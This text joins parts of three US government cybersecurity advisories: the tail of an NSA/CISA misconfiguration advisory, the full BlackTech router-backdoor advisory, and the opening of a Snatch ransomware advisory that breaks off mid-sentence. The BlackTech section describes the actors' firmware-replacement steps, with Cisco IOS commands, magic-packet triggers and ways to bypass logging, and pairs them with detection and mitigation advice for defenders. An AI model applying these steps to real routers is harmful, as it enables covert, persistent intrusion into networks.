https://support.microsoft.com/en-us/topic/how-to-verify-that-ms17-010-is-installed-f55d3f13-7a9c-688c-260b-477d0ec9f2c8 [18]  Microsoft, Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644), https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [19]  Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a [20]  CISA, Malware Analysis Report: 10365227.r1.v1, https://www.cisa.gov/sites/default/files/2023-06/mar-10365227.r1.v1.clear_.pdf [21]  Joint CSA: #StopRansomware: BianLian Ransomware Group, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a [22]  CISA Analysis Report: FiveHands Ransomware, https://www.cisa.gov/news-events/analysis-reports/ar21-126a [23]  Snaffler, https://github.com/SnaffCon/Snaffler [24]  CISA, Cross-Sector Cybersecurity Performance Goals, https://www.cisa.gov/cross-sector-cybersecurity-performance-goals [25]  Defense Information Systems Agency (DISA), Security Technical Implementation Guides (STIGs), https://public.cyber.mil/stigs/ [26]  NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF [27]  NSA, Actively Manage Systems and Configurations, https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf [28]  NSA, Cybersecurity Advisories & Guidance, https://www.nsa.gov/cybersecurity-guidance [29]  National Institute of Standards and Technologies (NIST), NIST SP 800-63B: Digital Identity Guidelines: Authentication and Lifecycle Management, https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final [30]  Microsoft, Uninstall-AdcsWebEnrollment, https://learn.microsoft.com/en-us/powershell/module/adcsdeployment/uninstall-adcswebenrollment [31]  Microsoft, KB5021989: Extended Protection for Authentication, https://support.microsoft.com/en-au/topic/kb5021989-extended-protection-for-authentication-1b6ea84d-377b-4677-a0b8-af74efbb243f [32]  Microsoft, Network security: Restrict NTLM: NTLM authentication in this domain, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain [33]  Microsoft, Network security: Restrict NTLM: Incoming NTLM traffic, https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic [34]  Microsoft, How to disable the Subject Alternative Name for UPN mapping, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/disable-subject-alternative-name-upn-mapping [35]  Microsoft, Overview of Server Message Block signing, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing [36]  Microsoft, SMB signing required by default in Windows Insider, https://aka.ms/SmbSigningRequired [37]  NSA, Defend Privileges and Accounts, https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf [38]  NSA, Advancing Zero Trust Maturity Throughout the User Pillar, https://media.defense.gov/2023/Mar/14/2003178390/-1/-1/0/CSI_Zero_Trust_User_Pillar_v1.1.PDF [39]  NSA, Continuously Hunt for Network Intrusions, https://media.defense.gov/2019/Sep/09/2002180360/-1/-1/0/Continuously%20Hunt%20for%20Network%20Intrusions%20-%20Copy.pdf [40]  Joint CSI: Detect and Prevent Web Shell Malware, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF [41]  NSA, Segment Networks and Deploy Application-aware Defenses, https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf [42]  Joint CSA: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, https://media.defense.gov/2020/Jul/23/2002462846/-1/-1/0/OT_ADVISORY-DUAL-OFFICIAL-20200722.PDF [43]  NSA, Stop Malicious Cyber Activity Against Connected Operational Technology, https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/0/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF [44]  NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF [45]  NSA, Update and Upgrade Software Immediately, https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf [46]  Microsoft, Microsoft Security Advisory 2871997: Update to Improve Credentials Protection and Management, https://learn.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997 [47]  CISA, Secure Cloud Business Applications Hybrid Identity Solutions Architecture, https://www.cisa.gov/sites/default/files/2023-03/csso-scuba-guidance_document-hybrid_identity_solutions_architecture-2023.03.22-final.pdf [48]  CISA, Secure Cloud Business Applications (SCuBA) Project, https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project [49]  NSA, Transition to Multi-factor Authentication, https://media.defense.gov/2019/Sep/09/2002180346/-1/-1/0/Transition%20to%20Multi-factor%20Authentication%20-%20Copy.pdf [50]  Committee on National Security Systems (CNSS), CNSS Policy 15, https://www.cnss.gov/CNSS/issuances/Policies.cfm [51]  NSA, NSA Releases Future Quantum-Resistant (QR) Algorithm Requirements for National Security Systems, https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/3148990/nsa-releases-future-quantum-resistant-qr-algorithm-requirements-for-national-se/ [52]  NSA, Enforce Signed Software Execution Policies, https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf [53]  Joint CSI: Keeping PowerShell: Security Measures to Use and Embrace, https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF [54]  NIST, NIST SP 800-218: Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities, https://csrc.nist.gov/publications/detail/sp/800-218/final Disclaimer of Endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Trademarks Active Directory, Microsoft, and Windows are registered trademarks of Microsoft Corporation. MITRE ATT&CK is registered trademark and MITRE D3FEND is a trademark of The MITRE Corporation. SoftPerfect is a registered trademark of SoftPerfect Proprietary Limited Company. Telerik is a registered trademark of Progress Software Corporation. VMware is a registered trademark of VMWare, Inc. Zimbra is a registered trademark of Synacor, Inc. Purpose This document was developed in furtherance of the authoring cybersecurity organizations’ missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact Cybersecurity Report Feedback: CybersecurityReports@nsa.gov General Cybersecurity Inquiries: Cybersecurity_Requests@nsa.gov  Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov  To report suspicious activity contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Appendix: MITRE ATT&CK Tactics and Techniques See Table 12–Table 21 for all referenced threat actor tactics and techniques in this advisory. Table 12: ATT&CK Techniques for Enterprise – Reconnaissance Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 Malicious actors scan victims for vulnerabilities that be exploited for initial access. Gather Victim Host Information T1592 Malicious actors gather information on victim client configurations and/or vulnerabilities through vulnerabilities scans and searching the web. Gather Victim Identity Information: Credentials T1589.001 Malicious actors find default credentials through searching the web. Phishing for Information T1598 Malicious actors masquerade as IT staff and convince a target user to provide their MFA code over the phone to gain access to email and other organizational resources. Table 13: ATT&CK Techniques for Enterprise – Initial Access Technique Title ID Use External Remote Services T1133 Malicious actors use default credentials for VPN access to internal networks. Valid Accounts: Default Accounts T1078.001 Malicious actors gain authenticated access to devices by finding default credentials through searching the web. Malicious actors use default credentials for VPN access to internal networks, and default administrative credentials to gain access to web applications and databases. Exploit Public-Facing Application T1190 Malicious actors exploit CVEs in Telerik UI, VM Horizon, Zimbra Collaboration Suite, and other applications for initial access to victim organizations. Phishing T1566 Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads. Trust Relationship T1199 Malicious actors gain access to OT networks despite prior assurance that the networks were fully air gapped, with no possible connection to the IT network, by finding special purpose, forgotten, or even accidental network connections. Table 14: ATT&CK Techniques for Enterprise – Execution Technique Title ID Use Software Deployment Tools T1072 Malicious actors use default or captured credentials on software deployment tools to execute code and move laterally. User Execution T1204 Malicious actors gain initial access to systems by phishing to entice end users to download and execute malicious payloads or to run code on their workstations. Command and Scripting Interpreter T1059 Malicious actors use scripting languages to obscure their actions and bypass allowlisting. Command and Scripting Interpreter: Visual Basic T1059.005 Malicious actors use macros for initial access, persistence, and lateral movement. Table 15: ATT&CK Techniques for Enterprise – Persistence Technique Title ID Use Account Manipulation T1098 Malicious actors reset built-in administrative accounts via predictable, forgotten password questions. Table 16: ATT&CK Techniques for Enterprise – Privilege Escalation Technique Title ID Use Valid Accounts T1078 Malicious actors analyze topical and nested Active Directory groups to find privileged accounts to target. Valid Accounts: Domain Accounts T1078.002 Malicious actors obtain loaded domain credentials from printers and scanners and use them to move laterally from the network device. Exploitation for Privilege Escalation T1068 Malicious actors load vulnerable drivers and then exploit their known vulnerabilities to execute code in the kernel with the highest level of system privileges to completely compromise the device. Table 17: ATT&CK Techniques for Enterprise – Defense Evasion Technique Title ID Use Obfuscated Files or Information: Command Obfuscation T1027.010 Malicious actors often use scripting languages to obscure their actions. Table 18: ATT&CK Techniques for Enterprise – Credential Access Technique Title ID Use Adversary-in-the-Middle T1557 Malicious actors force a device to communicate through actor-controlled systems, so they can collect information or perform additional actions. Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay T1557.001 Malicious actors execute spoofing, poisoning, and relay techniques if Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Server Message Block (SMB) services are enabled in a network. Brute Force: Password Cracking T1110.002 Malicious actors capture user hashes and leverage dictionary wordlists and rulesets to extract cleartext passwords. Credentials from Password Stores T1555 Malicious actors gain access to and crack credentials from PFX stores, enabling elevation of privileges and lateral movement within networks. Multi-Factor Authentication Interception T1111 Malicious actors can obtain password hashes for accounts enabled for MFA with smart codes or tokens and use the hash via PtH techniques. Multi-Factor Authentication Request Generation T1621 Malicious actors use “push bombing” against non-phishing resistant MFA to induce “MFA fatigue” in victims, gaining access to MFA authentication credentials or bypassing MFA, and accessing the MFA-protected system. Steal Application Access Token T1528 Malicious actors can steal administrator account credentials and the authentication token generated by Active Directory when the account is logged into a compromised host. Steal or Forge Authentication Certificates T1649 Unauthenticated malicious actors coerce an ADCS server to authenticate to an actor-controlled server, and then relay that authentication to the web certificate enrollment application to obtain a trusted illegitimate certificate. Steal or Forge Kerberos Tickets: Golden Ticket T1558.001 Malicious actors who have obtained authentication certificates can use the certificate for Active Directory authentication to obtain a Kerberos TGT. Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 Malicious actors obtain and abuse valid Kerberos TGTs to elevate privileges and laterally move throughout an organization’s network. Unsecured Credentials: Credentials in Files T1552.001 Malicious actors find cleartext credentials that organizations or individual users store in spreadsheets, configuration files, and other documents. Table 19: ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Account Discovery T1087 Malicious actors with valid domain credentials enumerate the AD to discover elevated accounts and where they are used. File and Directory Discovery T1083 Malicious actors use commands, such as net share, open source tools, such as SoftPerfect Network Scanner, or custom malware, such as CovalentStealer to discover and categorize files. Malicious actors search for text files, spreadsheets, documents, and configuration files in hopes of obtaining desired information, such as cleartext passwords. Network Share Discovery T1135 Malicious actors use commands, such as net share, open source tools, such as SoftPerfect Network Scanner, or custom malware, such as CovalentStealer, to look for shared folders and drives. Table 20: ATT&CK Techniques for Enterprise – Lateral Movement Technique Title ID Use Exploitation of Remote Services T1210 Malicious actors can exploit OS and firmware vulnerabilities to gain unauthorized network access, compromise sensitive data, and disrupt operations. Remote Services: SMB/Windows Admin Shares T1021.002 If SMB signing is not enforced, malicious actors can use name resolution poisoning to access remote systems. Use Alternate Authentication Material: Application Access Token T1550.001 Malicious actors with stolen administrator account credentials and AD authentication tokens can use them to operate with elevated permissions throughout the domain. Use Alternate Authentication Material: Pass the Hash T1550.002 Malicious actors collect hashes in a network and authenticate as a user without having access to the user's cleartext password. Table 21: ATT&CK Techniques for Enterprise – Collection Technique Title ID Use Data from Network Shared Drive T1039 Malicious actors find sensitive information on network shares that could facilitate follow-on activity or provide opportunities for extortion.

Executive Summary The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind. BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise. For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1] Download the PDF version of this report: PDF, 808 KB Technical Details This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs. Background Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks. Observable TTPs BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include: BendyBear [S0574] Bifrose BTSDoor FakeDead (a.k.a. TSCookie) [S0436] Flagpro [S0696] FrontShell (FakeDead’s downloader module) IconDown PLEAD [S0435] SpiderPig SpiderSpring SpiderStack WaterBear [S0579] BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002]. BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2] Pivoting from international subsidiaries The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks. Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002]. Maintaining access via stealthy router backdoors BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment. In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router's built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006], however, it is not always necessary. BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001]. Firmware replacement process BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH. Table 1: File types to compromise the router File Type Description Old Legitimate Firmware The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader. Modified Firmware The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router. Modified Bootloader The bootloader allows Modified Firmware to continue evading the router's security features for persistence across reboots. In some cases, only modified firmware is used. BlackTech actors use the Cisco router's CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows: Download old legitimate firmware. Set the router to load the old legitimate firmware and reboot with the following command(s): config t no boot system usbflash0 [filename] boot system usbflash0 [filename] end write reload Download the modified bootloader and modified firmware. Set the router to load the modified firmware with the following command(s):conf t no boot system usbflash0 [filename] boot system usbflash0 [filename] end write Load the modified bootloader (the router reboots automatically) with the following command:upgrade rom file bootloader Enable access by sending a trigger packet that has specific values within the UDP data or TCP Sequence Number field and the Maximum Segment Size (MSS) parameter within the TCP Options field. Modified bootloader To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test. Modified firmware BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image. BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging. To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication. Detection and Mitigation Techniques In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH. The following are the best mitigation practices to defend against this type of malicious activity: Disable outbound connections by applying the "transport output none" configuration command to the virtual teletype (VTY) lines. This command will prevent some copy commands from successfully connecting to external systems.Note: An adversary with unauthorized privileged level access to a network device could revert this configuration change.[3] Monitor both inbound and outbound connections from network devices to both external and internal systems. In general, network devices should only be connecting to nearby devices for exchanging routing or network topology information or with administrative systems for time synchronization, logging, authentication, monitoring, etc. If feasible, block unauthorized outbound connections from network devices by applying access lists or rule sets to other nearby network devices. Additionally, place administrative systems in separate virtual local area networks (VLANs) and block all unauthorized traffic from network devices destined for non-administrative VLANs.[4] Limit access to administration services and only permit IP addresses used by network administrators by applying access lists to the VTY lines or specific services. Monitor logs for successful and unsuccessful login attempts with the "login on-failure log" and "login on-success log" configuration commands, or by reviewing centralized Authentication, Authorization, and Accounting (AAA) events.[3] Upgrade devices to ones that have secure boot capabilities with better integrity and authenticity checks for bootloaders and firmware. In particular, highly prioritize replacing all end-of-life and unsupported equipment as soon as possible.[3],[5] When there is a concern that a single password has been compromised, change all passwords and keys.[3] Review logs generated by network devices and monitor for unauthorized reboots, operating system version changes, changes to the configuration, or attempts to update the firmware. Compare against expected configuration changes and patching plans to verify that the changes are authorized.[3] Periodically perform both file and memory verification described in the Network Device Integrity (NDI) Methodology documents to detect unauthorized changes to the software stored and running on network devices.[3] Monitor for changes to firmware. Periodically take snapshots of boot records and firmware and compare against known good images.[3] Works Cited [1]    Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF [2]    Joint CSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF [3]    NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF [4]    NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF  [5]    Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 Disclaimer of endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes. Trademark recognition Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc. FreeBSD is a registered trademark of The FreeBSD Foundation. Linux is a registered trademark of Linus Torvalds. MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation. Windows is a registered trademark of Microsoft Corporation. Purpose This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations. Contact NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov  NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov  NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office. Appendix: MITRE ATT&CK Techniques See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory. Table 2: BlackTech ATT&CK Techniques for Enterprise – Resource Development Technique Title ID Use Obtain Capabilities: Code Signing Certificates T1588.003 BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses. Table 3: BlackTech ATT&CK Techniques for Enterprise – Initial Access Technique Title ID Use Initial Access TA0001 BlackTech actors gain access to victim networks by exploiting routers. Trusted Relationship T1199 BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks. Table 4: BlackTech ATT&CK Techniques for Enterprise – Persistence Technique Title ID Use Persistence TA0003 BlackTech actors gain persistent access to victims’ networks. Traffic Signaling T1205 BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router. Pre-OS Boot: ROMMONkit T1542.004 BlackTech actors modify router firmware to maintain persistence. Table 5: BlackTech ATT&CK Techniques for Enterprise – Privilege Escalation Technique Title ID Use Privilege Escalation TA0004 BlackTech actors gain elevated privileges on a victim’s network. Table 6: BlackTech ATT&CK Techniques for Enterprise – Defense Evasion Technique Title ID Use Defense Evasion TA0005 BlackTech actors configure their tools to evade detection by security software and EDR. Modify Registry T1112 BlackTech actors modify the victim’s registry. Impair Defenses T1562 BlackTech actors disable logging on compromised routers to avoid detection and evade defenses. Impair Defenses: Impair Command History Logging T1562.003 BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued. Modify System Image: Patch System Image T1601.001 BlackTech actors modify router firmware to evade detection. Table 7: BlackTech ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Discovery TA0007 BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information. Table 8: BlackTech ATT&CK Techniques for Enterprise – Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 BlackTech actors use RDP to move laterally across a victim’s network. Remote Services: SSH T1021.004 BlackTech actors use SSH to move laterally across a victim’s network. Table 9: BlackTech ATT&CK Techniques for Enterprise – Command and Control Technique Title ID Use Command and Control TA0011 BlackTech actors compromise and control a victim’s network infrastructure. Application Layer Protocol: File Transfer Protocols T1071.002 BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers. Proxy T1090 BlackTech actors use compromised routers to proxy traffic.

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023. Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Download the PDF version of this report: AA23-263A.pdf (PDF, 578.71 KB ) For a downloadable copy of IOCs, see: AA23-263A STIX XML (XML, 79.84 KB ) AA23-263A STIX JSON (JSON, 56.10 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running. Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1] Initial Access and Persistence Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078]. Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133]. Data Discovery and Lateral Movement Snatch threat actors were observed using different 